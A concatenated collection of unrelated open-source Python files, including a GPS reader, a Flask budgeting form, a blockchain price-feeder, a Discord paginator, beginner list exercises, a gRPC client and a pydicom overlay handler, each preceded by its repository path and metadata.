for token_id in token_info_map:
assert token_id in map_from_file, (
f"Failed to save token id: {token_id}")
class TestEtherscanConnector:
@pytest.fixture
def connector(self) -> etherscan.EtherscanConnector:
return etherscan.EtherscanConnector()
def test_get_tx_receipt(self, connector: etherscan.EtherscanConnector):
tx_hash: str = "0x20f98d428f3452a858ddb0972628991f50c529fbc5883111d1db1e6ba2eb4121"
tx_receipt: Dict[str, Any] = connector.get_tx_receipt(tx_hash=tx_hash)
assert isinstance(tx_receipt, dict)
assert all([isinstance(key, str) for key in tx_receipt])
| 2,435 |
modules/get_gps.py
|
zrschell/weatheringwithus
| 1 |
2171178
|
import subprocess
def get_gps_data():
p = subprocess.Popen('timeout 1s grep -qsRw -m 1 "/\$GPGGA/" /dev/serial0', shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
gps_data = str(out.decode("utf-8")).split(",")
try:
latitude = gps_data[2]
latitude_split = latitude.split(".")
latitude = latitude_split[0][0:-2] + "." + latitude_split[1]
if latitude_split[0][0] == "0":
latitude = "-" + latitude
longitude = gps_data[4]
longitude_split = longitude.split(".")
longitude = longitude_split[0][0:-2]+ "." + longitude_split[1]
if longitude_split[0][0] == "0":
longitude = "-" + longitude
latitude = float(latitude)
longitude = float(longitude)
data = {"latitude": latitude, "longitude": longitude}
return data
except:
print("gps not detected")
return False
if __name__ == "__main__":
data = get_gps_data()
print(data)
| 1,052 |
var/spack/repos/builtin/packages/r-islr/package.py
|
jeanbez/spack
| 0 |
2171532
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class RIslr(RPackage):
"""Data for an Introduction to Statistical Learning with Applications in R.
We provide the collection of data-sets used in the book 'An Introduction to
Statistical Learning with Applications in R'."""
cran = "ISLR"
version('1.4', sha256='7151c636808198ee759cbcf22f82a7aa76580fb8d11e4cd67f69f85401c820c3')
version('1.2', sha256='b00f7a06d2fb646917e629cc2dbdab71c7de3eb17a8a4d06849901a299f1caad')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'), when='@1.4:')
| 787 |
home_budgeting_app/expenditure/forms.py
|
TobKed/Home-Budgeting-App
| 0 |
2172521
|
from datetime import datetime
from flask_login import current_user
from flask_wtf import Form
from wtforms import DateTimeField, DecimalField, SelectField, StringField, SubmitField
from wtforms.validators import DataRequired
from home_budgeting_app.expenditure.models import Category
class ExpenditureForm(Form):
value = DecimalField("Value", places=2, validators=[DataRequired()])
spent_at = DateTimeField("Spent at", format="%Y-%m-%dT%H:%M", validators=[])
comment = StringField("Comment")
category = SelectField("Category", coerce=int, validators=[DataRequired()])
submit = SubmitField("Save")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.spent_at.data:
self.spent_at.data = datetime.today().replace(microsecond=0, second=0)
if current_user.is_authenticated:
categories = (
Category.query.filter(Category.user_id == current_user.id)
.order_by(Category.expenditures_count.desc())
.all()
)
choices = [(cat.id, "-".join(cat.path)) for cat in categories]
self.category.choices = choices
| 1,186 |
jenkins/generate.py
|
shengxinhu/tvm
| 4,640 |
2169855
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import jinja2
import argparse
import difflib
import re
import datetime
import textwrap
from pathlib import Path
REPO_ROOT = Path(__file__).resolve().parent.parent
JENKINSFILE_TEMPLATE = REPO_ROOT / "jenkins" / "Jenkinsfile.j2"
JENKINSFILE = REPO_ROOT / "Jenkinsfile"
data = {
"images": [
{
"name": "ci_arm",
"platform": "ARM",
},
{
"name": "ci_cpu",
"platform": "CPU",
},
{
"name": "ci_gpu",
"platform": "CPU",
},
{
"name": "ci_hexagon",
"platform": "CPU",
},
{
"name": "ci_i386",
"platform": "CPU",
},
{
"name": "ci_lint",
"platform": "CPU",
},
{
"name": "ci_qemu",
"platform": "CPU",
},
{
"name": "ci_wasm",
"platform": "CPU",
},
]
}
def lines_without_generated_tag(content):
return [
line for line in content.splitlines(keepends=True) if not line.startswith("// Generated at")
]
if __name__ == "__main__":
help = "Regenerate Jenkinsfile from template"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--check", action="store_true", help="just verify the output didn't change")
args = parser.parse_args()
with open(JENKINSFILE) as f:
content = f.read()
data["generated_time"] = datetime.datetime.now().isoformat()
environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(REPO_ROOT),
undefined=jinja2.StrictUndefined,
lstrip_blocks=True,
trim_blocks=True,
keep_trailing_newline=True,
)
template = environment.get_template(str(JENKINSFILE_TEMPLATE.relative_to(REPO_ROOT)))
new_content = template.render(**data)
diff = "".join(
difflib.unified_diff(
lines_without_generated_tag(content), lines_without_generated_tag(new_content)
)
)
if args.check:
if not diff:
print("Success, the newly generated Jenkinsfile matched the one on disk")
exit(0)
else:
print(
textwrap.dedent(
"""
Newly generated Jenkinsfile did not match the one on disk! If you have made
edits to the Jenkinsfile, move them to 'jenkins/Jenkinsfile.j2' and
regenerate the Jenkinsfile from the template with
python3 -m pip install -r jenkins/requirements.txt
python3 jenkins/generate.py
Diffed changes:
"""
).strip()
)
print(diff)
exit(1)
else:
with open(JENKINSFILE, "w") as f:
f.write(new_content)
if not diff:
print(f"Wrote output to {JENKINSFILE.relative_to(REPO_ROOT)}, no changes made")
else:
print(f"Wrote output to {JENKINSFILE.relative_to(REPO_ROOT)}, changes:")
print(diff)
| 3,936 |
data/plots/src/plt_bar_diffuse.py
|
lovaulonze/paper.gr_nanopore
| 0 |
2172629
|
import numpy
import matplotlib.pyplot as plt
salts = ["KCl", "NaCl", "LiCl", "CaCl2", "MgSO4", "K2SO4", "KFeCN"]
data = numpy.genfromtxt("../data/diffuse-pcte-salt.csv",
delimiter=",",
skip_header=2)
plt.figure(figsize=(3, 3 * 0.8))
plt.style.use("science")
# for i in range(len(salts)):
# name = salts[i]
# Measured
data = data / 1e-6
print(data.shape)
x = numpy.arange(len(salts))
w = 1.0 /6
#bare pcte measure
plt.bar(x - w * 3 / 2 , data[:, 6], width=w,
yerr=data[:, 7], color="blue",
label="raw")
# Simulate
plt.bar(x - w / 2, data[:, 3], width=w, color="red",
yerr=data[:, 5 : 3 : -1].T,
label="simu")
# Bare
plt.bar(x + 1 / 2 * w, data[:, 1], width=w,
yerr=data[:, 2], color="green",
label="gr")
#
# plt.plot(data[:, 1] / 3600, data[:, 2] / 1e-3)
# plt.xlabel("t (h)")
# plt.ylabel("Conductivity")
plt.xticks(range(0, 7))
plt.xlim(-0.5, 6.5)
plt.legend()
plt.savefig("../img/diffusion-salts.svg")
| 1,023 |
python/1002.py
|
felipesud/beecrowd
| 0 |
2173159
|
# The formula to calculate the area of a circumference is defined as A = π . R2. Considering to this problem that π = 3.14159:
# Calculate the area using the formula given in the problem description.
# Input
# The input contains a value of floating point (double precision), that is the variable R.
# Output
# Present the message "A=" followed by the value of the variable, as in the example bellow, with four places after the decimal point. Use all double precision variables. Like all the problems, don't forget to print the end of line after the result, otherwise you will receive "Presentation Error".
R = float(input())
R = R*R*3.14159
print("A=%.4f" % R)
| 666 |
base/feeder.py
|
AssetFun/feedprice
| 0 |
2172223
|
#coding=utf-8
import json
import time
import math
import demjson
from grapheneapi import grapheneapi
import log
import price_assetfun_get_price
import threading
import re
class Feeder(object):
def __init__(self, self_config_file):
self_config=[]
self.feeded_invalid_price=[] #[2018-1-15 lilianwen add]
with open(self_config_file,"r",encoding='utf-8') as cf:
self_config = json.load(cf)
print(self_config)
self._host = self_config["host"]
self._port = self_config["port"]
self._login_account = self_config["login_account"]
self._password = self_config["password"]
self._time_offset = self_config["time_offset"]
self._interval = self_config["interval"]
self._logger = log.LogInit(self_config["log_file"], when="D", log_name="feed_price")
self._feed_func_config = self_config["feed_price"]
print(self._feed_func_config)
if len(self_config["witnesses"]) == 0:
config_file = self_config["witness_config_file"]
print(config_file)
self._witnesses = self.get_witness_ids( config_file )
else:
self._witnesses = self_config["witnesses"]
def connect(self, host, port, login_account, passwd):
self._rpc_ro = grapheneapi.GrapheneAPI(host, port, "", "")
self._rpc_feed = grapheneapi.GrapheneAPI(host, port, login_account, passwd)
ret = self._rpc_feed.is_locked()
if ret:
self._rpc_feed.unlock(passwd)
#根据配置文件决定见证人列表
def get_witness_ids(self, config_file):
witness_ids=[]
with open(config_file,"r") as f:
lines = f.readlines()#读取全部内容
for line in lines:
if line.find("witness-id") != -1 and line.find("#") == -1:
pattern = re.compile('"(.*)"')
witness_ids.append(pattern.findall(line)[0])
return witness_ids
def feed_coin(self):
print("======================================feed one time==============================")
dyn_prop = self._rpc_ro.get_dynamic_global_properties()
print(dyn_prop["current_witness"])
print(self._witnesses)
self._feed_account = self._rpc_ro.get_witness(dyn_prop["current_witness"])["witness_account"]
if dyn_prop["current_witness"] in self._witnesses:
for one_index in self._feed_records:
if one_index[0] == "1":#只喂数字货币
for one_platform in self._feed_records[one_index]:
for one_trade_pair in self._feed_records[one_index][one_platform]:
self.feed(one_index, one_platform, one_trade_pair)
#曾经喂过的非法币价的时间戳列表
give_up=[]
if self.feeded_invalid_price:
for one in self.feeded_invalid_price:
self._logger.info("Reset coin price")
uint_time=int(time.time())
if uint_time - one[3] < 300 and uint_time - one[3]>120:#时间是否已经超过5分钟,超过五分钟后喂价网站那边不再更新价格
index = one[0]
quote_base = one[2]
platform = one[1]
uint_time = one[3]
quote = quote_base.split("/")[0]
base = quote_base.split("/")[1]
price = self._rpc_ro.get_coin_price(index, quote_base, str(uint_time))
if price["price"] == -100000000:#读区块链上该价格是否为非法喂价
get_feed_func = self._feed_records[index][platform][quote_base]
prices = get_feed_func(quote,base,platform,uint_time,uint_time)
self._logger.info("[Refeed invalid price]GetPrices(%s:%s):%s" %(platform,quote_base,str(prices)))
try:
self._rpc_feed.reset_coin_price(self._feed_account,index,quote_base,prices,True)
self._logger.info("[Refeed invalid price success.")
except Exception as err:
self._logger.error(err)
else:
self._logger.info("Price on blockchain is %s,so not reset it." %(str(price["price"])))
give_up.append(one)
else:
self._logger.info("Current reset coin price time is not valid(%s,not in[5,300])." %(uint_time - one[3]))
give_up.append(one)
if give_up:
for one in give_up:
self.feeded_invalid_price.remove(one)
uint_time=int(time.time())
if uint_time%10==0:
_timer = threading.Timer(self._interval, self.feed_coin)
_timer.start()
else:
_timer = threading.Timer(self._interval-(uint_time%10), self.feed_coin)
_timer.start()
def feed(self, index, platform, quote_base):
quote=quote_base.split("/")[0]
base=quote_base.split("/")[1]
uint_time=int(time.time())
uint_time=int((uint_time-self._time_offset)/60)*60
get_feed_func = self._feed_records[index][platform][quote_base]
prices = get_feed_func(quote,base,platform,uint_time,uint_time)
print("result get prices,before feed price:")
print(prices)
one_invalid_price=[]
for one in prices:
if one[1] == -100000000:
one_invalid_price.append(index)
one_invalid_price.append(platform)
one_invalid_price.append(quote_base)
one_invalid_price.append(one[0])
self.feeded_invalid_price.append(one_invalid_price)
self._logger.info("put one invalid price case in list")
self._logger.info("[Feed]GetPrices(%s:%s_%s):%s" %(platform,quote,base,str(prices)))
try:
ret=self._rpc_feed.feed_coin_price(self._feed_account,index,quote_base,prices,True)
print(ret)
print("feed price success.")
except Exception as err:
err = str(err)
npos=err.find("Feed coin price time not continuous")
if npos != -1:
start=err.index("{start:")+len("{start:")
end=err.index(", end:now}")
start_timestamp=int(err[start:end])
end_timestamp=int((time.time()-self._time_offset)/60)*60
if end_timestamp < start_timestamp:#[lilianwen add 2018-1-15 修复结束时间戳大于起始时间戳的bug]
self._logger.error("start timestamp(%d) is large than end timestamp(%d).Maybe time offset(%d) is too large" %(start_timestamp, end_timestamp, self._time_offset))
end_timestamp=int((time.time()-60)/60)*60
prices = get_feed_func(quote,base,platform,start_timestamp,end_timestamp)
print("result get prices,before refeed price:")
print(prices)
self._logger.info("[Refeed]GetPrices(%s:%s_%s):%s" %(platform,quote,base,str(prices)))
self.refeed(index, platform, quote_base, prices)
else:
self._logger.error(err)
def refeed(self,index, platform, quote_base, prices):
try:
ret=self._rpc_feed.feed_coin_price(self._feed_account,index,quote_base,prices,True)
print(ret)
print("refeed price success.")
except Exception as err:
self._logger.exception(err)
#分析区块链上的喂价配置信息,返回重新组织过的信息
def analyze_blockchain_config(self, strJson):
result={}
for one in strJson["module_cfg"]:
platform=strJson["module_cfg"][one]["platform_en"]
platform_trade_pair={}
quote_bases=[]
for one_trade_pair in strJson["module_cfg"][one]["quote_bases"]:
if strJson["module_cfg"][one]["quote_bases"][one_trade_pair] == "1":
quote_bases.append(one_trade_pair)
platform_trade_pair[platform]=quote_bases
result[one]=platform_trade_pair
return result
#注册喂价函数
def register_feed_price_func(self, blockCfg, feedFuncCfg):
result={}
for platform in feedFuncCfg:
result_no_index={}
for index in blockCfg:
if platform in blockCfg[index]:
quote_base_func={}
for quote_base in feedFuncCfg[platform]:
if quote_base in blockCfg[index][platform]:
quote_base_func[quote_base] = eval(feedFuncCfg[platform][quote_base])
result_no_index[platform]=quote_base_func
result[index] = result_no_index
return result
def start(self):
self.connect(self._host, self._port, self._login_account, self._password)
blokchain_cfg = self._rpc_ro.get_module_cfg("COIN")
blokchain_cfg = self.analyze_blockchain_config(blokchain_cfg)
self._feed_records = self.register_feed_price_func(blokchain_cfg,self._feed_func_config)
_timer = threading.Timer(self._interval, self.feed_coin)
_timer.start()
#遍历gold喂价
#遍历stock喂价
| 9,711 |
functions/custom_pages.py
|
rageyboiii/test-boy
| 0 |
2173104
|
import asyncio
import nextcord as discord
from nextcord.ext import commands
from nextcord.ext.menus import MenuPages
from . import views
class Menu(MenuPages):
def __init__(self, source, extra_items=[], **kwargs):
self.extra_items = extra_items
self.button_ids = ["help-first", "help-back", "help-next", "help-last", "help-stop"]
self.interaction = None
super().__init__(source, **kwargs)
class PaginationButtons(discord.ui.View):
def __init__(self, *, extra=[], first_disabled=False, back_disabled=False, next_disabled=False, last_disabled=False, stop_disabled=False):
self.first_disabled, self.back_disabled, self.next_disabled, self.last_disabled, self.stop_disabled, = first_disabled, back_disabled, next_disabled, last_disabled, stop_disabled
super().__init__()
for item in extra:
self.add_item(item)
self.add_item(discord.ui.Button(emoji="⏮", disabled=first_disabled, style=discord.ButtonStyle.primary, custom_id="help-first"))
self.add_item(discord.ui.Button(emoji="◀", disabled=back_disabled, style=discord.ButtonStyle.primary, custom_id="help-back"))
self.add_item(discord.ui.Button(emoji="▶", disabled=next_disabled, style=discord.ButtonStyle.primary, custom_id="help-next"))
self.add_item(discord.ui.Button(emoji="⏭", disabled=last_disabled, style=discord.ButtonStyle.primary, custom_id="help-last"))
self.add_item(discord.ui.Button(emoji="⛔", disabled=stop_disabled, style=discord.ButtonStyle.danger, custom_id="help-stop"))
async def send_initial_message(self, ctx: commands.Context, channel: discord.TextChannel):
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
view = self.PaginationButtons(extra=views.Links().links, first_disabled=True, back_disabled=True)
return await ctx.send(**kwargs, view=view)
def component_check(self, payload: discord.Interaction) -> bool:
if payload.message.id != self.message.id:
return False
if payload.user.id not in {self.bot.owner_id, self._author_id, *self.bot.owner_ids}:
return False
return payload.data["custom_id"] in self.button_ids
async def _internal_loop(self):
try:
self.__timed_out = False
loop = self.bot.loop
tasks = []
while self._running:
interaction = await self.bot.wait_for("interaction", check=self.component_check, timeout=self.timeout)
loop.create_task(self.update(interaction))
except asyncio.TimeoutError:
self.__timed_out = True
finally:
# self.__event.set()
for task in tasks:
task.cancel()
try:
await self.finalize(self.__timed_out)
except Exception:
pass
finally:
self.__timed_out = False
if self.bot.is_closed():
return
try:
if self.delete_message_after:
return await self.message.delete()
if self.clear_reactions_after:
if self._can_remove_reactions:
return await self.message.edit(view=views.Links())
except Exception:
pass
async def update(self, payload: discord.Interaction):
if not self._running:
return
try:
await self.on_component(payload)
except Exception as exc:
self.bot.logger.exception(exc)
# await self.on_menu_button_error(exc)
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
if page_number == 0:
kwargs.update(view=self.PaginationButtons(extra=views.Links().links, first_disabled=True, back_disabled=True))
elif page_number == self._source.get_max_pages() - 1:
kwargs.update(view=self.PaginationButtons(extra=views.Links().links, last_disabled=True, next_disabled=True))
else:
kwargs.update(view=self.PaginationButtons(extra=views.Links().links))
if self.interaction:
await self.interaction.edit_original_message(**kwargs)
else:
await self.message.edit(**kwargs)
async def on_component(self, ctx: discord.Interaction):
if not self.interaction:
await ctx.response.defer()
if ctx.data["custom_id"] == "help-first":
await self.show_page(0)
elif ctx.data["custom_id"] == "help-back":
await self.show_checked_page(self.current_page - 1)
elif ctx.data["custom_id"] == "help-next":
await self.show_checked_page(self.current_page + 1)
elif ctx.data["custom_id"] == "help-last":
await self.show_page(self._source.get_max_pages() - 1)
elif ctx.data["custom_id"] == "help-stop":
self.stop()
if not self.interaction:
self.interaction = ctx
async def start(self, ctx: commands.Context, *, channel: discord.TextChannel = None, wait: bool = False):
try:
del self.buttons
except AttributeError:
pass
self.bot = bot = ctx.bot
self.ctx = ctx
self._author_id = ctx.author.id
channel = channel or ctx.channel
is_guild = isinstance(channel, discord.abc.GuildChannel)
me = channel.guild.me if is_guild else ctx.bot.user
permissions = channel.permissions_for(me)
self.__me = discord.Object(id=me.id)
self._verify_permissions(ctx, channel, permissions)
self._event.clear()
msg = self.message
if msg is None:
self.message = msg = await self.send_initial_message(ctx, channel)
if self.should_add_reactions():
for task in self.__tasks:
task.cancel()
self.__tasks.clear()
self._running = True
self.__tasks.append(bot.loop.create_task(self._internal_loop()))
if wait:
await self._event.wait()
def stop(self):
self._running = False
for task in self.__tasks:
task.cancel()
self.__tasks.clear()
| 5,775 |
liste.py
|
beboy01/nan-project
| 0 |
2171788
|
######################## exo 1 ############################""
"""dans cette exercise vous devez récuperer les différents morceaux
de la liste grace aux slices
la de départ est la suivante
liste = ["Maxime", "Martine", "Christopher", "Carlos", "Michael", "Eric"]
L'objectif de cet exercise est de récuperer les informations grace aux slices:
--Les trois premiers employés ('Maxime', "Martine", "Christopher") dans une liste
trois premiers
--les trois derniers employés ('Carlos', "Michael" et Eric) dans une liste les trois
derniers.
--tous les employés sauf le premiers et le derniers dans une liste milieu
--Le premier et le derniers employédans une liste premier_dernier
"""
liste = ["Maxime", "Martine", "Christopher", "Carlos", "Michael", "Eric"]
trois_premiers = print(liste[0:3]) # INSÉRER CODE ICI
trois_derniers = print(liste[3:]) # INSÉRER CODE ICI
milieu = print(liste[1:-1])# INSÉRER CODE ICI
premier_dernier = print(liste[0::5]) # INSÉRER CODE ICI
print("############### Fin de l'exercie numéro 1 #################")
################################ exo 2 #######################################
"""
Dans cet exercice, vous devez ajouter le nombre 6 dans la liste.
Faites une vérification par la suite pour vous assurer que l'élément a bien été ajouté.
La liste de départ est la suivante :
liste = [1, 2, 3, 4, 5] Vous devez ajouter le nombre 6 dans la liste.
Vérifiez ensuite si le nombre 6 est présent dans la liste, si c'est le cas,
affichez la chaîne de caractères Le nombre 6 a bien été ajouté à la liste.
"""
liste2 = [1, 2, 3, 4, 5]
liste2[4] = 6
i=6
if i== liste2[4]:
print(f"Le nombre {i} à bien été ajouter à la liste")
else:
print(f"Erreur de l'ajout du nombre {i}")
############################# Exo 3 ##########################################
"""
Récuperer des élements dans une liste imbriquée
Dans cet exercice, vous devez Récuperer des informations à l'intérieur de deux listes imbriquées.
Le script dispose de deux listes contenant plusieurs listes imbriqués, une liste langage et une liste nombres.
Vous devez Récuperer dans les variables python, deux et sept, respectivement la chaîne de caractères 'Python'
contenue dans la liste langages et les nombres 2 et 7, contenus dans la liste nombres.
Vous n'avez pas besoin d'afficher les variables avec print,
il suffit de Récuperer les bonnes valeurs dans les variables à partir
des listes et avec les indices des éléments.
"""
print(" ############################# Exo 3 ########################################## ")
langages = [["Python", "C++"], "Java"]
nombres = [1, [4, [2, 3]], 5, [6], [[7]]]
python =print(langages[0][0]) # entrez le code ici
deux= print(nombres[1][1][0]) # entrez le code ici
sept= print(nombres[4][0][0])# entrez le code ici
| 2,863 |
examples/input_example/main.py
|
iranathan/RobloxPy
| 1 |
2171984
|
import robloxpy
id = input("Please type an Asset ID: ")
print("Sales: "+ robloxpy.Asset.sales(id))
print("Price in tickets: "+ robloxpy.Asset.price_in_tickets(id))
print("Price in robux: "+ robloxpy.Asset.price_in_robux(id))
print("Creator: " + robloxpy.Asset.creator(id))
| 273 |
fortune/fortune_client.py
|
meffie/grpc-demos
| 0 |
2172138
|
import argparse
import logging
import sys
import grpc
import fortune_pb2
import fortune_pb2_grpc
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--host', help='fortune host', default='localhost')
parser.add_argument('--port', type=int, help='port number', default='50050')
parser.add_argument('-c', '--category', help='fortune category')
parser.add_argument('-l', '--list-categories', action='store_true', help='list fortune categories')
args = parser.parse_args()
logging.basicConfig()
addr = '{0}:{1}'.format(args.host, args.port)
with grpc.insecure_channel(addr) as channel:
stub = fortune_pb2_grpc.FortuneStub(channel)
if args.list_categories:
try:
response = stub.ListCategories(fortune_pb2.Empty())
print('\n'.join(response.categories))
except grpc.RpcError as e:
print('rpc error')
print('details:', e.details())
print('code:', e.code())
else:
try:
request = fortune_pb2.CookieRequest(category=args.category)
response = stub.GetCookie(request)
print(response.cookie)
except grpc.RpcError as e:
print('rpc error')
print('details:', e.details())
print('code:', e.code())
if __name__ == '__main__':
sys.exit(main())
| 1,496 |
BatchLabelMap/automatic/pydicom/overlays/numpy_handler.py
|
weras2/BatchLabelMap
| 0 |
2172821
|
# Copyright 2008-2019 pydicom authors. See LICENSE file for details.
"""Use the `numpy <https://numpy.org/>`_ package to convert supported *Overlay
Data* to a :class:`numpy.ndarray`.
**Supported data**
The numpy handler supports the conversion of data in the (60xx,3000)
*Overlay Data* element to a :class:`~numpy.ndarray` provided the
related :dcm:`Overlay Plane<part03/sect_C.9.2.html>` and :dcm:`Multi-frame
Overlay<part03/sect_C.9.3.html>` module elements have values given in the
table below.
+------------------------------------------------+--------------+
| Element | Supported |
+-------------+---------------------------+------+ values |
| Tag | Keyword | Type | |
+=============+===========================+======+==============+
| (60xx,0010) | OverlayRows | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0011) | OverlayColumns | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0015) | NumberOfFramesInOverlay | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0100) | OverlayBitsAllocated | 1 | 1 |
+-------------+---------------------------+------+--------------+
| (60xx,0102) | OverlayBitPosition | 1 | 0 |
+-------------+---------------------------+------+--------------+
"""
from typing import TYPE_CHECKING, cast, Dict, Any, Optional
import warnings
try:
import numpy as np
HAVE_NP = True
except ImportError:
HAVE_NP = False
from pydicom.pixel_data_handlers.numpy_handler import unpack_bits
if TYPE_CHECKING: # pragma: no cover
from pydicom.dataset import Dataset
from pydicom.dataelem import DataElement
HANDLER_NAME = 'Numpy Overlay'
DEPENDENCIES = {'numpy': ('http://www.numpy.org/', 'NumPy')}
def is_available() -> bool:
"""Return ``True`` if the handler has its dependencies met.
.. versionadded:: 1.4
"""
return HAVE_NP
def get_expected_length(elem: Dict[str, Any], unit: str = 'bytes') -> int:
"""Return the expected length (in terms of bytes or pixels) of the *Overlay
Data*.
.. versionadded:: 1.4
+------------------------------------------------+-------------+
| Element | Required or |
+-------------+---------------------------+------+ optional |
| Tag | Keyword | Type | |
+=============+===========================+======+=============+
| (60xx,0010) | OverlayRows | 1 | Required |
+-------------+---------------------------+------+-------------+
| (60xx,0011) | OverlayColumns | 1 | Required |
+-------------+---------------------------+------+-------------+
| (60xx,0015) | NumberOfFramesInOverlay | 1 | Required |
+-------------+---------------------------+------+-------------+
Parameters
----------
elem : dict
A :class:`dict` with the keys as the element keywords and values the
corresponding element values (such as ``{'OverlayRows': 512, ...}``)
for the elements listed in the table above.
unit : str, optional
If ``'bytes'`` then returns the expected length of the *Overlay Data*
in whole bytes and NOT including an odd length trailing NULL padding
byte. If ``'pixels'`` then returns the expected length of the *Overlay
Data* in terms of the total number of pixels (default ``'bytes'``).
Returns
-------
int
The expected length of the *Overlay Data* in either whole bytes or
pixels, excluding the NULL trailing padding byte for odd length data.
"""
length: int = elem['OverlayRows'] * elem['OverlayColumns']
length *= elem['NumberOfFramesInOverlay']
if unit == 'pixels':
return length
# Determine the nearest whole number of bytes needed to contain
# 1-bit pixel data. e.g. 10 x 10 1-bit pixels is 100 bits, which
# are packed into 12.5 -> 13 bytes
return length // 8 + (length % 8 > 0)
def reshape_overlay_array(
elem: Dict[str, Any], arr: "np.ndarray"
) -> "np.ndarray":
"""Return a reshaped :class:`numpy.ndarray` `arr`.
.. versionadded:: 1.4
+------------------------------------------------+--------------+
| Element | Supported |
+-------------+---------------------------+------+ values |
| Tag | Keyword | Type | |
+=============+===========================+======+==============+
| (60xx,0010) | OverlayRows | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0011) | OverlayColumns | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0015) | NumberOfFramesInOverlay | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
Parameters
----------
elem : dict
A :class:`dict` with the keys as the element keywords and values the
corresponding element values (such as ``{'OverlayRows': 512, ...}``)
for the elements listed in the table above.
arr : numpy.ndarray
A 1D array containing the overlay data.
Returns
-------
numpy.ndarray
A reshaped array containing the overlay data. The shape of the array
depends on the contents of the dataset:
* For single frame data (rows, columns)
* For multi-frame data (frames, rows, columns)
References
----------
* DICOM Standard, Part 3, Sections :dcm:`C.9.2<part03/sect_C.9.2.html>`
and :dcm:`C.9.3<part03/sect_C.9.3.html>`
* DICOM Standard, Part 5, :dcm:`Section 8.2<part05/sect_8.2.html>`
"""
if not HAVE_NP:
raise ImportError("Numpy is required to reshape the overlay array.")
nr_frames = elem['NumberOfFramesInOverlay']
nr_rows = elem['OverlayRows']
nr_columns = elem['OverlayColumns']
if nr_frames < 1:
raise ValueError(
f"Unable to reshape the overlay array as a value of {nr_frames} "
"for (60xx,0015) 'Number of Frames in Overlay' is invalid."
)
if nr_frames > 1:
return arr.reshape(nr_frames, nr_rows, nr_columns)
return arr.reshape(nr_rows, nr_columns)
def get_overlay_array(ds: "Dataset", group: int) -> "np.ndarray":
"""Return a :class:`numpy.ndarray` of the *Overlay Data*.
.. versionadded:: 1.4
Parameters
----------
ds : Dataset
The :class:`Dataset` containing an Overlay Plane module and the
*Overlay Data* to be converted.
group : int
The group part of the *Overlay Data* element tag, e.g. ``0x6000``,
``0x6010``, etc. Must be between 0x6000 and 0x60FF.
Returns
-------
np.ndarray
The contents of (`group`,3000) *Overlay Data* as an array.
Raises
------
AttributeError
If `ds` is missing a required element.
ValueError
If the actual length of the overlay data doesn't match the expected
length.
"""
if not HAVE_NP:
raise ImportError("The overlay data handler requires numpy")
# Check required elements
elem = {
'OverlayData': ds.get((group, 0x3000), None),
'OverlayBitsAllocated': ds.get((group, 0x0100), None),
'OverlayRows': ds.get((group, 0x0010), None),
'OverlayColumns': ds.get((group, 0x0011), None),
}
missing = [kk for kk, vv in elem.items() if vv is None]
if missing:
raise AttributeError(
"Unable to convert the overlay data as the following required "
f"elements are missing from the dataset: {', '.join(missing)}"
)
# Grab the element values
elem_values = {kk: vv.value for kk, vv in elem.items()}
# Add in if not present
nr_frames: Optional["DataElement"] = ds.get((group, 0x0015), None)
if nr_frames is None:
elem_values['NumberOfFramesInOverlay'] = 1
else:
elem_values['NumberOfFramesInOverlay'] = nr_frames.value
# Calculate the expected length of the pixel data (in bytes)
# Note: this does NOT include the trailing null byte for odd length data
expected_len = get_expected_length(elem_values)
# Check that the actual length of the pixel data is as expected
actual_length = len(cast(bytes, elem_values['OverlayData']))
# Correct for the trailing NULL byte padding for odd length data
padded_expected_len = expected_len + expected_len % 2
if actual_length < padded_expected_len:
if actual_length == expected_len:
warnings.warn(
"The overlay data length is odd and misses a padding byte."
)
else:
raise ValueError(
"The length of the overlay data in the dataset "
f"({actual_length} bytes) doesn't match the expected length "
f"({padded_expected_len} bytes). The dataset may be corrupted "
"or there may be an issue with the overlay data handler."
)
elif actual_length > padded_expected_len:
# PS 3.5, Section 8.1.1
warnings.warn(
f"The length of the overlay data in the dataset ({actual_length} "
"bytes) indicates it contains excess padding. "
f"{actual_length - expected_len} bytes will be removed "
"from the end of the data"
)
# Unpack the pixel data into a 1D ndarray, skipping any trailing padding
nr_pixels = get_expected_length(elem_values, unit='pixels')
arr = unpack_bits(elem_values['OverlayData'])[:nr_pixels]
return reshape_overlay_array(elem_values, arr)
| 9,931 |
PyHEADTAIL/general/decorators.py
|
fsoubelet/PyHEADTAIL
| 0 |
2172228
|
'''
@authors: <NAME>
@date: 02/10/2014
Provide useful decorators for PyHEADTAIL.
'''
import warnings
from functools import wraps
from PyHEADTAIL.gpu import gpu_utils
def deprecated(message):
'''Deprecation warning as described in warnings documentation.
'''
def deprecated_decorator(func):
@wraps(func)
def deprecated_wrapper(*args, **kwargs):
if func.__name__ == "__init__":
name = args[0].__name__
else:
name = func.__name__
warnings.simplefilter('always', DeprecationWarning)
warnings.warn('\n\n*** DEPRECATED: "{:s}" will be replaced in a future '
